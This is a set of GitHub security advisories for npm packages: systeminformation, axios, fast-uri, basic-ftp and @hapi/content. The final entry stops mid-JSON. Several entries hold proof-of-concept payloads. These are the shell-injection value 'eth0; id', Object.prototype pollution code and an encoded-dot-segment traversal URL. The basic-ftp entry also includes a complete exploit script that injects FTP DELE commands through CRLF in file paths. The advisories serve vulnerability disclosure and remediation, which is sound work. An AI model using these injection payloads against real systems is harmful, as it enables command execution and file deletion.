GHSA-9C88-49P5-5GGF
Vulnerability from github – Published: 2026-02-18 21:51 – Updated: 2026-02-19 21:57Summary
A command injection vulnerability in the wifiNetworks() function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path.
Details
In lib/wifi.js, the wifiNetworks() function sanitizes the iface parameter on the initial call (line 437). However, when the initial scan returns empty results, a setTimeout retry (lines 440-441) calls getWifiNetworkListIw(iface) with the original unsanitized iface value, which is passed directly to execSync('iwlist ${iface} scan').
PoC
- Install
systeminformation@5.30.7 - Call
si.wifiNetworks('eth0; id') - The first call sanitizes input, but if results are empty, the retry executes:
iwlist eth0; id scan
Impact
Remote Code Execution (RCE). Any application passing user-controlled input to si.wifiNetworks() is vulnerable to arbitrary command execution with the privileges of the Node.js process.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "systeminformation"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.30.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26280"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T21:51:26Z",
"nvd_published_at": "2026-02-19T20:25:43Z",
"severity": "HIGH"
},
"details": "### Summary\nA command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path.\n\n### Details\nIn `lib/wifi.js`, the `wifiNetworks()` function sanitizes the `iface` parameter on the initial call (line 437). However, when the initial scan returns empty results, a `setTimeout` retry (lines 440-441) calls `getWifiNetworkListIw(iface)` with the **original unsanitized** `iface` value, which is passed directly to `execSync(\u0027iwlist ${iface} scan\u0027)`.\n\n### PoC\n1. Install `systeminformation@5.30.7`\n2. Call `si.wifiNetworks(\u0027eth0; id\u0027)`\n3. The first call sanitizes input, but if results are empty, the retry executes: `iwlist eth0; id scan`\n\n### Impact\nRemote Code Execution (RCE). Any application passing user-controlled input to `si.wifiNetworks()` is vulnerable to arbitrary command execution with the privileges of the Node.js process.",
"id": "GHSA-9c88-49p5-5ggf",
"modified": "2026-02-19T21:57:02Z",
"published": "2026-02-18T21:51:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-9c88-49p5-5ggf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26280"
},
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/commit/22242aa56188f2bffcbd7d265a11e1ebb808b460"
},
{
"type": "PACKAGE",
"url": "https://github.com/sebhildebrandt/systeminformation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Systeminformation has a Command Injection via unsanitized interface parameter in wifi.js retry path"
}
GHSA-6CHQ-WFR3-2HJ9
Vulnerability from github – Published: 2026-05-05 00:25 – Updated: 2026-05-05 00:25Summary
A prototype pollution gadget exists in the Axios HTTP adapter (lib/adapters/http.js) that allows an attacker to inject arbitrary HTTP headers into outgoing requests. The vulnerability exploits duck-type checking of the data payload, where if Object.prototype is polluted with getHeaders, append, pipe, on, once, and Symbol.toStringTag, Axios misidentifies any plain object payload as a FormData instance and calls the attacker-controlled getHeaders() function, merging the returned headers into the outgoing request.
The vulnerable code resides exclusively in lib/adapters/http.js. The prototype pollution source does not need to originate from Axios itself — any prototype pollution primitive in any dependency in the application's dependency tree is sufficient to trigger this gadget.
Prerequisites:
A prototype pollution primitive must exist somewhere in the application's dependency chain (e.g., via lodash.merge, qs, JSON5, or any deep-merge utility processing attacker-controlled input). The pollution source is not required to be in Axios. The application must use Axios to make HTTP requests with a data payload (POST, PUT, PATCH).
Details
The vulnerability is in lib/adapters/http.js, in the data serialization pipeline:
// lib/adapters/http.js
} else if (utils.isFormData(data) && utils.isFunction(data.getHeaders)) {
headers.set(data.getHeaders());
// ...
}
Axios uses two sequential duck-type checks, both of which can be satisfied via prototype pollution:
1. utils.isFormData(data) — lib/utils.js
const isFormData = (thing) => {
let kind;
return thing && (
(typeof FormData === 'function' && thing instanceof FormData) || (
isFunction(thing.append) && (
(kind = kindOf(thing)) === 'formdata' ||
(kind === 'object' && isFunction(thing.toString) && thing.toString() === '[object FormData]')
)
)
)
}
2. utils.isFunction(data.getHeaders) — Duck-type for form-data npm package
// Returns true if Object.prototype.getHeaders is a function
utils.isFunction(data.getHeaders)
PoC
// Simulate Prototype Pollution
Object.prototype[Symbol.toStringTag] = 'FormData';
Object.prototype.append = () => {};
Object.prototype.getHeaders = () => {
const headers = Object.create(null);
(.... Introduce here all the headers you want ....)
return headers;
};
Object.prototype.pipe = function(d) { if(d&&d.end)d.end(); return d; };
Object.prototype.on = function() { return this; };
Object.prototype.once = function() { return this; };
// Legitimate application code
const response = await axios.post('https://internal-api.company.com/admin/delete',
{ userId: 42 },
{ headers: { 'Authorization': 'Bearer VALID_USER_TOKEN' } }
);
Impact
- Authentication Bypass (CVSS: C:H)
- Session Fixation (CVSS: I:H)
- Privilege Escalation (CVSS: C:H, I:H)
- IP Spoofing / WAF Bypass (CVSS: I:H)
Note on Scope: There is an argument to promote this from S:U to S:C (Scope: Changed), which would raise the score to 10.0. In some architectures, Axios is commonly used for service to service communication where downstream services trust identity headers (Authorization, X-Role, X-User-ID, X-Tenant-ID) forwarded from upstream API gateways. In this scenario, the vulnerable component (Axios in Service A) and the impacted component (Service B, which acts on the injected identity) are under different security authorities. The injected headers cross a trust boundary, meaning the impact extends beyond the security scope of the vulnerable component, the CVSS v3.1 definition of a Scope Change. We conservatively score S:U here, but maintainers should evaluate which one applies better here.
Recommended Fix
Add an explicit own-property check in lib/adapters/http.js:
- } else if (utils.isFormData(data) && utils.isFunction(data.getHeaders)) {
- headers.set(data.getHeaders());
+ } else if (utils.isFormData(data) && utils.isFunction(data.getHeaders) &&
+ Object.prototype.hasOwnProperty.call(data, 'getHeaders')) {
+ headers.set(data.getHeaders());
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.15.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.31.0"
},
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.31.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42035"
],
"database_specific": {
"cwe_ids": [
"CWE-113",
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T00:25:47Z",
"nvd_published_at": "2026-04-24T18:16:30Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA prototype pollution gadget exists in the Axios HTTP adapter (lib/adapters/http.js) that allows an attacker to inject arbitrary HTTP headers into outgoing requests. The vulnerability exploits duck-type checking of the data payload, where if Object.prototype is polluted with getHeaders, append, pipe, on, once, and Symbol.toStringTag, Axios misidentifies any plain object payload as a FormData instance and calls the attacker-controlled getHeaders() function, merging the returned headers into the outgoing request.\n\nThe vulnerable code resides exclusively in lib/adapters/http.js. The prototype pollution source does not need to originate from Axios itself \u2014 any prototype pollution primitive in any dependency in the application\u0027s dependency tree is sufficient to trigger this gadget.\n\nPrerequisites:\n\nA prototype pollution primitive must exist somewhere in the application\u0027s dependency chain (e.g., via lodash.merge, qs, JSON5, or any deep-merge utility processing attacker-controlled input). The pollution source is not required to be in Axios.\nThe application must use Axios to make HTTP requests with a data payload (POST, PUT, PATCH).\n\n### Details\n\nThe vulnerability is in `lib/adapters/http.js`, in the data serialization pipeline:\n\n```javascript\n// lib/adapters/http.js \n} else if (utils.isFormData(data) \u0026\u0026 utils.isFunction(data.getHeaders)) {\n headers.set(data.getHeaders());\n // ...\n}\n```\n\nAxios uses two sequential duck-type checks, both of which can be satisfied via prototype pollution:\n\n**1. `utils.isFormData(data)` \u2014 `lib/utils.js`**\n```javascript\nconst isFormData = (thing) =\u003e {\n let kind;\n return thing \u0026\u0026 (\n (typeof FormData === \u0027function\u0027 \u0026\u0026 thing instanceof FormData) || (\n isFunction(thing.append) \u0026\u0026 ( \n (kind = kindOf(thing)) === \u0027formdata\u0027 || \n (kind === \u0027object\u0027 \u0026\u0026 isFunction(thing.toString) \u0026\u0026 thing.toString() === \u0027[object FormData]\u0027)\n )\n )\n )\n}\n```\n\n**2. `utils.isFunction(data.getHeaders)` \u2014 Duck-type for `form-data` npm package**\n```javascript\n// Returns true if Object.prototype.getHeaders is a function\nutils.isFunction(data.getHeaders) \n```\n\n### PoC\n\n```javascript\n// Simulate Prototype Pollution\nObject.prototype[Symbol.toStringTag] = \u0027FormData\u0027;\nObject.prototype.append = () =\u003e {};\nObject.prototype.getHeaders = () =\u003e {\n const headers = Object.create(null);\n (.... Introduce here all the headers you want ....)\n return headers;\n};\nObject.prototype.pipe = function(d) { if(d\u0026\u0026d.end)d.end(); return d; };\nObject.prototype.on = function() { return this; };\nObject.prototype.once = function() { return this; };\n\n// Legitimate application code\nconst response = await axios.post(\u0027https://internal-api.company.com/admin/delete\u0027, \n { userId: 42 },\n { headers: { \u0027Authorization\u0027: \u0027Bearer VALID_USER_TOKEN\u0027 } }\n);\n```\n\n### Impact\n\n- Authentication Bypass (CVSS: C:H)\n- Session Fixation (CVSS: I:H)\n- Privilege Escalation (CVSS: C:H, I:H)\n- IP Spoofing / WAF Bypass (CVSS: I:H)\n\n**Note on Scope**: There is an argument to promote this from **S:U to S:C** (Scope: Changed), which would raise the score to **10.0**. In some architectures, Axios is commonly used for service to service communication where downstream services trust identity headers (`Authorization`, `X-Role`, `X-User-ID`, `X-Tenant-ID`) forwarded from upstream API gateways. In this scenario, the vulnerable component (Axios in Service A) and the impacted component (Service B, which acts on the injected identity) are under different security authorities. The injected headers cross a trust boundary, meaning the impact extends beyond the security scope of the vulnerable component, the CVSS v3.1 definition of a Scope Change. We conservatively score S:U here, but maintainers should evaluate which one applies better here.\n\n### Recommended Fix\n\nAdd an explicit own-property check in `lib/adapters/http.js`:\n\n```diff\n- } else if (utils.isFormData(data) \u0026\u0026 utils.isFunction(data.getHeaders)) {\n- headers.set(data.getHeaders());\n+ } else if (utils.isFormData(data) \u0026\u0026 utils.isFunction(data.getHeaders) \u0026\u0026\n+ Object.prototype.hasOwnProperty.call(data, \u0027getHeaders\u0027)) {\n+ headers.set(data.getHeaders());\n```",
"id": "GHSA-6chq-wfr3-2hj9",
"modified": "2026-05-05T00:25:47Z",
"published": "2026-05-05T00:25:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Axios: Header Injection via Prototype Pollution"
}
GHSA-Q3J6-QGPJ-74H6
Vulnerability from github – Published: 2026-05-08 17:15 – Updated: 2026-05-08 17:15Impact
fast-uri v3.1.0 and earlier decodes percent-encoded path separators (%2F) and dot segments (%2E) before applying dot-segment removal in normalize() and equal(). This makes encoded path data behave like real / and .., so distinct URIs collapse onto the same normalized path.
For example, http://example.com/public/%2e%2e/admin normalizes to http://example.com/admin, and equal() considers them the same URI.
Applications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed. A path that looks confined under an allowed prefix can normalize to a different location.
Patches
Upgrade to fast-uri >= 3.1.1.
Workarounds
None. Upgrade to the patched version.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.0"
},
"package": {
"ecosystem": "npm",
"name": "fast-uri"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-6321"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T17:15:09Z",
"nvd_published_at": "2026-05-04T20:16:20Z",
"severity": "HIGH"
},
"details": "### Impact\n\n`fast-uri` v3.1.0 and earlier decodes percent-encoded path separators (`%2F`) and dot segments (`%2E`) before applying dot-segment removal in `normalize()` and `equal()`. This makes encoded path data behave like real `/` and `..`, so distinct URIs collapse onto the same normalized path.\n\nFor example, `http://example.com/public/%2e%2e/admin` normalizes to `http://example.com/admin`, and `equal()` considers them the same URI.\n\nApplications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed. A path that looks confined under an allowed prefix can normalize to a different location.\n\n### Patches\n\nUpgrade to `fast-uri` \u003e= 3.1.1.\n\n### Workarounds\n\nNone. Upgrade to the patched version.",
"id": "GHSA-q3j6-qgpj-74h6",
"modified": "2026-05-08T17:15:09Z",
"published": "2026-05-08T17:15:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/fastify/fast-uri"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "fast-uri vulnerable to path traversal via percent-encoded dot segments"
}
GHSA-CHQC-8P9Q-PQ6Q
Vulnerability from github – Published: 2026-04-08 20:02 – Updated: 2026-04-09 19:06Summary
basic-ftp version 5.2.0 allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.
Affected product
| Product | Affected versions | Fixed version |
|---|---|---|
| basic-ftp (npm) | 5.2.0 (confirmed) | no fix available as of 2026-04-04 |
Vulnerability details
- CWE:
CWE-93- Improper Neutralization of CRLF Sequences ('CRLF Injection') - CVSS 3.1:
8.6(High) - Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L - Affected component:
dist/Client.js, all path-handling methods viaprotectWhitespace()andsend()
The vulnerability exists because of two interacting code patterns:
1. Inadequate path sanitization in protectWhitespace() (line 677):
async protectWhitespace(path) {
if (!path.startsWith(" ")) {
return path; // No sanitization of \r\n characters
}
const pwd = await this.pwd();
const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
return absolutePathPrefix + path;
}
This function only handles leading whitespace. It does not strip or reject \r (0x0D) or \n (0x0A) characters anywhere in the path string.
2. Direct socket write in send() (FtpContext.js line 177):
send(command) {
this._socket.write(command + "\r\n", this.encoding);
}
The send() method appends \r\n to the command and writes directly to the TCP socket. If the command string already contains \r\n sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.
Affected methods (all call protectWhitespace() → send()):
- cd(path) → CWD ${path}
- remove(path) → DELE ${path}
- list(path) → LIST ${path}
- downloadTo(localPath, remotePath) → RETR ${remotePath}
- uploadFrom(localPath, remotePath) → STOR ${remotePath}
- rename(srcPath, destPath) → RNFR ${srcPath} / RNTO ${destPath}
- removeDir(path) → RMD ${path}
Technical impact
An attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:
- Arbitrary file deletion: Inject
DELE /critical-fileto delete files on the FTP server - Directory manipulation: Inject
MKDorRMDcommands to create/remove directories - File exfiltration: Inject
RETRcommands to trigger downloads of unintended files - Server command execution: On FTP servers supporting
SITE EXEC, inject system commands - Session hijacking: Inject
USER/PASScommands to re-authenticate as a different user - Service disruption: Inject
QUITto terminate the FTP session unexpectedly
The attack is realistic in applications that accept user input for FTP file paths — for example, web applications that allow users to specify files to download from or upload to an FTP server.
Proof of concept
Prerequisites:
mkdir basic-ftp-poc && cd basic-ftp-poc
npm init -y
npm install basic-ftp@5.2.0
Mock FTP server (ftp-server-mock.js):
const net = require('net');
const server = net.createServer(conn => {
console.log('[+] Client connected');
conn.write('220 Mock FTP\r\n');
let buffer = '';
conn.on('data', data => {
buffer += data.toString();
const lines = buffer.split('\r\n');
buffer = lines.pop();
for (const line of lines) {
if (!line) continue;
console.log('[CMD] ' + JSON.stringify(line));
if (line.startsWith('USER')) conn.write('331 OK\r\n');
else if (line.startsWith('PASS')) conn.write('230 Logged in\r\n');
else if (line.startsWith('FEAT')) conn.write('211 End\r\n');
else if (line.startsWith('TYPE')) conn.write('200 OK\r\n');
else if (line.startsWith('PWD')) conn.write('257 "/"\r\n');
else if (line.startsWith('OPTS')) conn.write('200 OK\r\n');
else if (line.startsWith('STRU')) conn.write('200 OK\r\n');
else if (line.startsWith('CWD')) conn.write('250 OK\r\n');
else if (line.startsWith('DELE')) conn.write('250 Deleted\r\n');
else if (line.startsWith('QUIT')) { conn.write('221 Bye\r\n'); conn.end(); }
else conn.write('200 OK\r\n');
}
});
});
server.listen(2121, () => console.log('[*] Mock FTP on port 2121'));
Exploit (poc.js):
const ftp = require('basic-ftp');
async function exploit() {
const client = new ftp.Client();
client.ftp.verbose = true;
try {
await client.access({
host: '127.0.0.1',
port: 2121,
user: 'anonymous',
password: 'anonymous'
});
// Attack 1: Inject DELE command via cd()
// Intended: CWD harmless.txt
// Actual: CWD harmless.txt\r\nDELE /important-file.txt
const maliciousPath = "harmless.txt\r\nDELE /important-file.txt";
console.log('\n=== Attack 1: DELE injection via cd() ===');
try { await client.cd(maliciousPath); } catch(e) {}
// Attack 2: Double DELE via remove()
const maliciousPath2 = "decoy.txt\r\nDELE /secret-data.txt";
console.log('\n=== Attack 2: DELE injection via remove() ===');
try { await client.remove(maliciousPath2); } catch(e) {}
} finally {
client.close();
}
}
exploit();
Running the PoC:
# Terminal 1: Start mock FTP server
node ftp-server-mock.js
# Terminal 2: Run exploit
node poc.js
Expected output on mock server:
"OPTS UTF8 ON"
"USER anonymous"
"PASS anonymous"
"FEAT"
"TYPE I"
"STRU F"
"OPTS UTF8 ON"
"CWD harmless.txt"
"DELE /important-file.txt" <-- injected from cd()
"DELE decoy.txt"
"DELE /secret-data.txt" <-- injected from remove()
"QUIT"
This command trace was reproduced against the published basic-ftp@5.2.0
package on Linux with a local mock FTP server. The injected DELE commands are
received as distinct FTP commands, confirming that CRLF inside path parameters
is not neutralized before socket write.
Mitigation
Immediate workaround: Sanitize all path inputs before passing them to basic-ftp:
function sanitizeFtpPath(path) {
if (/[\r\n]/.test(path)) {
throw new Error('Invalid FTP path: contains control characters');
}
return path;
}
// Usage
await client.cd(sanitizeFtpPath(userInput));
Recommended fix for basic-ftp: The protectWhitespace() function (or a new validation layer) should reject or strip \r and \n characters from all path inputs:
async protectWhitespace(path) {
// Reject CRLF injection attempts
if (/[\r\n\0]/.test(path)) {
throw new Error('Invalid path: contains control characters');
}
if (!path.startsWith(" ")) {
return path;
}
const pwd = await this.pwd();
const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
return absolutePathPrefix + path;
}
References
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "basic-ftp"
},
"ranges": [
{
"events": [
{
"introduced": "5.2.0"
},
{
"fixed": "5.2.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"5.2.0"
]
}
],
"aliases": [
"CVE-2026-39983"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-08T20:02:25Z",
"nvd_published_at": "2026-04-09T18:17:02Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`basic-ftp` version `5.2.0` allows FTP command injection via CRLF sequences (`\\r\\n`) in file path parameters passed to high-level path APIs such as `cd()`, `remove()`, `rename()`, `uploadFrom()`, `downloadTo()`, `list()`, and `removeDir()`. The library\u0027s `protectWhitespace()` helper only handles leading spaces and returns other paths unchanged, while `FtpContext.send()` writes the resulting command string directly to the control socket with `\\r\\n` appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.\n\n## Affected product\n\n| Product | Affected versions | Fixed version |\n| --- | --- | --- |\n| basic-ftp (npm) | 5.2.0 (confirmed) | no fix available as of 2026-04-04 |\n\n## Vulnerability details\n\n- CWE: `CWE-93` - Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)\n- CVSS 3.1: `8.6` (`High`)\n- Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L`\n- Affected component: `dist/Client.js`, all path-handling methods via `protectWhitespace()` and `send()`\n\nThe vulnerability exists because of two interacting code patterns:\n\n**1. Inadequate path sanitization in `protectWhitespace()` (line 677):**\n\n```javascript\nasync protectWhitespace(path) {\n if (!path.startsWith(\" \")) {\n return path; // No sanitization of \\r\\n characters\n }\n const pwd = await this.pwd();\n const absolutePathPrefix = pwd.endsWith(\"/\") ? pwd : pwd + \"/\";\n return absolutePathPrefix + path;\n}\n```\n\nThis function only handles leading whitespace. It does not strip or reject `\\r` (0x0D) or `\\n` (0x0A) characters anywhere in the path string.\n\n**2. Direct socket write in `send()` (FtpContext.js line 177):**\n\n```javascript\nsend(command) {\n this._socket.write(command + \"\\r\\n\", this.encoding);\n}\n```\n\nThe `send()` method appends `\\r\\n` to the command and writes directly to the TCP socket. If the command string already contains `\\r\\n` sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.\n\n**Affected methods** (all call `protectWhitespace()` \u2192 `send()`):\n- `cd(path)` \u2192 `CWD ${path}`\n- `remove(path)` \u2192 `DELE ${path}`\n- `list(path)` \u2192 `LIST ${path}`\n- `downloadTo(localPath, remotePath)` \u2192 `RETR ${remotePath}`\n- `uploadFrom(localPath, remotePath)` \u2192 `STOR ${remotePath}`\n- `rename(srcPath, destPath)` \u2192 `RNFR ${srcPath}` / `RNTO ${destPath}`\n- `removeDir(path)` \u2192 `RMD ${path}`\n\n## Technical impact\n\nAn attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:\n\n1. **Arbitrary file deletion**: Inject `DELE /critical-file` to delete files on the FTP server\n2. **Directory manipulation**: Inject `MKD` or `RMD` commands to create/remove directories\n3. **File exfiltration**: Inject `RETR` commands to trigger downloads of unintended files\n4. **Server command execution**: On FTP servers supporting `SITE EXEC`, inject system commands\n5. **Session hijacking**: Inject `USER`/`PASS` commands to re-authenticate as a different user\n6. **Service disruption**: Inject `QUIT` to terminate the FTP session unexpectedly\n\nThe attack is realistic in applications that accept user input for FTP file paths \u2014 for example, web applications that allow users to specify files to download from or upload to an FTP server.\n\n## Proof of concept\n\n**Prerequisites:**\n\n```bash\nmkdir basic-ftp-poc \u0026\u0026 cd basic-ftp-poc\nnpm init -y\nnpm install basic-ftp@5.2.0\n```\n\n**Mock FTP server (ftp-server-mock.js):**\n\n```javascript\nconst net = require(\u0027net\u0027);\nconst server = net.createServer(conn =\u003e {\n console.log(\u0027[+] Client connected\u0027);\n conn.write(\u0027220 Mock FTP\\r\\n\u0027);\n let buffer = \u0027\u0027;\n conn.on(\u0027data\u0027, data =\u003e {\n buffer += data.toString();\n const lines = buffer.split(\u0027\\r\\n\u0027);\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log(\u0027[CMD] \u0027 + JSON.stringify(line));\n if (line.startsWith(\u0027USER\u0027)) conn.write(\u0027331 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027PASS\u0027)) conn.write(\u0027230 Logged in\\r\\n\u0027);\n else if (line.startsWith(\u0027FEAT\u0027)) conn.write(\u0027211 End\\r\\n\u0027);\n else if (line.startsWith(\u0027TYPE\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027PWD\u0027)) conn.write(\u0027257 \"/\"\\r\\n\u0027);\n else if (line.startsWith(\u0027OPTS\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027STRU\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027CWD\u0027)) conn.write(\u0027250 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027DELE\u0027)) conn.write(\u0027250 Deleted\\r\\n\u0027);\n else if (line.startsWith(\u0027QUIT\u0027)) { conn.write(\u0027221 Bye\\r\\n\u0027); conn.end(); }\n else conn.write(\u0027200 OK\\r\\n\u0027);\n }\n });\n});\nserver.listen(2121, () =\u003e console.log(\u0027[*] Mock FTP on port 2121\u0027));\n```\n\n**Exploit (poc.js):**\n\n```javascript\nconst ftp = require(\u0027basic-ftp\u0027);\n\nasync function exploit() {\n const client = new ftp.Client();\n client.ftp.verbose = true;\n try {\n await client.access({\n host: \u0027127.0.0.1\u0027,\n port: 2121,\n user: \u0027anonymous\u0027,\n password: \u0027anonymous\u0027\n });\n\n // Attack 1: Inject DELE command via cd()\n // Intended: CWD harmless.txt\n // Actual: CWD harmless.txt\\r\\nDELE /important-file.txt\n const maliciousPath = \"harmless.txt\\r\\nDELE /important-file.txt\";\n console.log(\u0027\\n=== Attack 1: DELE injection via cd() ===\u0027);\n try { await client.cd(maliciousPath); } catch(e) {}\n\n // Attack 2: Double DELE via remove()\n const maliciousPath2 = \"decoy.txt\\r\\nDELE /secret-data.txt\";\n console.log(\u0027\\n=== Attack 2: DELE injection via remove() ===\u0027);\n try { await client.remove(maliciousPath2); } catch(e) {}\n\n } finally {\n client.close();\n }\n}\nexploit();\n```\n\n**Running the PoC:**\n\n```bash\n# Terminal 1: Start mock FTP server\nnode ftp-server-mock.js\n\n# Terminal 2: Run exploit\nnode poc.js\n```\n\n**Expected output on mock server:**\n\n```\n\"OPTS UTF8 ON\"\n\"USER anonymous\"\n\"PASS anonymous\"\n\"FEAT\"\n\"TYPE I\"\n\"STRU F\"\n\"OPTS UTF8 ON\"\n\"CWD harmless.txt\"\n\"DELE /important-file.txt\" \u003c-- injected from cd()\n\"DELE decoy.txt\"\n\"DELE /secret-data.txt\" \u003c-- injected from remove()\n\"QUIT\"\n```\n\nThis command trace was reproduced against the published `basic-ftp@5.2.0`\npackage on Linux with a local mock FTP server. The injected `DELE` commands are\nreceived as distinct FTP commands, confirming that CRLF inside path parameters\nis not neutralized before socket write.\n\n## Mitigation\n\n**Immediate workaround**: Sanitize all path inputs before passing them to basic-ftp:\n\n```javascript\nfunction sanitizeFtpPath(path) {\n if (/[\\r\\n]/.test(path)) {\n throw new Error(\u0027Invalid FTP path: contains control characters\u0027);\n }\n return path;\n}\n\n// Usage\nawait client.cd(sanitizeFtpPath(userInput));\n```\n\n**Recommended fix for basic-ftp**: The `protectWhitespace()` function (or a new validation layer) should reject or strip `\\r` and `\\n` characters from all path inputs:\n\n```javascript\nasync protectWhitespace(path) {\n // Reject CRLF injection attempts\n if (/[\\r\\n\\0]/.test(path)) {\n throw new Error(\u0027Invalid path: contains control characters\u0027);\n }\n if (!path.startsWith(\" \")) {\n return path;\n }\n const pwd = await this.pwd();\n const absolutePathPrefix = pwd.endsWith(\"/\") ? pwd : pwd + \"/\";\n return absolutePathPrefix + path;\n}\n```\n\n## References\n\n- [npm package: basic-ftp](https://www.npmjs.com/package/basic-ftp)\n- [GitHub repository](https://github.com/patrickjuchli/basic-ftp)\n- [Vulnerable source: Client.js protectWhitespace()](https://github.com/patrickjuchli/basic-ftp/blob/master/src/Client.ts)\n- [Vulnerable source: FtpContext.js send()](https://github.com/patrickjuchli/basic-ftp/blob/master/src/FtpContext.ts)\n- [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html)\n- [OWASP: CRLF Injection](https://owasp.org/www-community/vulnerabilities/CRLF_Injection)",
"id": "GHSA-chqc-8p9q-pq6q",
"modified": "2026-04-09T19:06:10Z",
"published": "2026-04-08T20:02:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39983"
},
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b"
},
{
"type": "PACKAGE",
"url": "https://github.com/patrickjuchli/basic-ftp"
},
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "basic-ftp has FTP Command Injection via CRLF"
}
GHSA-JG4P-7FHP-P32P
Vulnerability from github – Published: 2026-04-04 04:23 – Updated: 2026-04-24 13:43All versions of @hapi/content through 6.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via crafted HTTP header values. Three regular expressions used to parse Content-Type and Content-Disposition headers contain patterns susceptible to catastrophic backtracking. This has been fixed in v6.0.1.
Impact
Denial of Service. An unauthenticated remote attacker can cause a Node.js process to become unresponsive by sending a single HTTP request with a maliciously crafted header value.
Patches
Fixed by tightening all three regular expressions to eliminate backtracking.
Workarounds
There are no known workarounds. Upgrade to the patched version.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.0.0"
},
"package": {
"ecosystem": "npm",
"name": "@hapi/content"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
